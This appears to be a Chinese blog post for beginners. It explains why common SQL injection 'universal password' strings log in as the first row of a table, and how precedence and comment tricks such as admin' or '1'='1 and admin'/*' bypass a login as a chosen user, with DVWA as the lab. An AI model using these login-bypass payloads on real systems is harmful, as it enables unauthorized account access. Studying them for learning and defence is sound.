前言
在sql注入中万能密码是最很典型,也是基础的存在,但新手很容易忽视它,以为真正懂了,但却没有。我就是这样,最近重新看它,发现我根本就没真正掌握,甚至网上很多关于万能密码的分析是错的
分析
sql语句中and的优先级比or的高
假设sql语句是这样
SELECT * FROM users WHERE username='$uname' and password=$passwd'
正常输入一个用户名为admin密码为admin的账户,如下
SELECT * FROM users WHERE username='admin' and password='admin'
返回一条数据
网上的常见的万能语句是这样的
- 用户名为
admin密码为' or '1'='1
SELECT * FROM users WHERE username='admin' and password='' or '1'='1'
这个语句确实返回的为True,但是他返回的是所有的数据
你所登录的用户就是查询出来的第一个
而在这个数据库中则是Dumb,而不是想要的admin
因为and的优先级比or的高
所以数据库是这样比较的
username='admin' and password='' #先判断这个and语句,结果为假
or '1'='1' #再与这个语句比较
'1'='1'相当于任意的数据,而假 or 任意值,最终返回所有的数据
如果你只改username,无论输入任意值都不会影响这个结果
- 用户名为
' or ''=''密码为' or ''='
SELECT * FROM users WHERE username='' or ''='' and password='' or ''=''
原来在i春秋上看的一个视频就是以这个讲的
这个和上面的原理是一样的,你用户名为空都可以,根本没必要搞得那么麻烦
这些语句你会发现在dvwa的sql注入关卡不能用
dvwa的代码中有一个if判断,返回是否是一条数据,所有这些返回全部数据的就不奏效(密码进行了加密也是原因)
我也是因此发现端倪的
正确姿势
- 用户名为
admin' or '1'='1,密码为空即可
SELECT * FROM users WHERE username='admin' or '1'='1' and password=''
username='admin'
or
'1'='1' and password='' #and得到假
先进行and,得到就是username='admin' or 假,然后只会返回username值为admin的数据
可以看到无论是 '1'='1'还是'1'='2'都不影响结果,因为and后面的password已经为不成立了
- 用户名为
admin'/*',密码为*/#即可
利用注释符
SELECT * FROM users WHERE username='admin'/*' and password='*/#'
总结
要踏踏实实的学好每一个知识点